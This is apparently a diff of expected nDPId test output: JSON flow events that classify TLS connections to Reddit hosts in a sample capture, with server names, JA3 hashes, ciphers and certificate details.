-01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":807,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":818,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686084,"flow_last_seen":1605291686183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686183,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686130,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":535,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605291686035,"flow_last_seen":1605291686137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":541,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} 
+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":571,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":680,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":686,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":696,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":700,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686064,"flow_last_seen":1605291686142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":713,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":717,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":722,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686145,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686145,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":736,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":738,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} 
+01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":751,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":754,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 
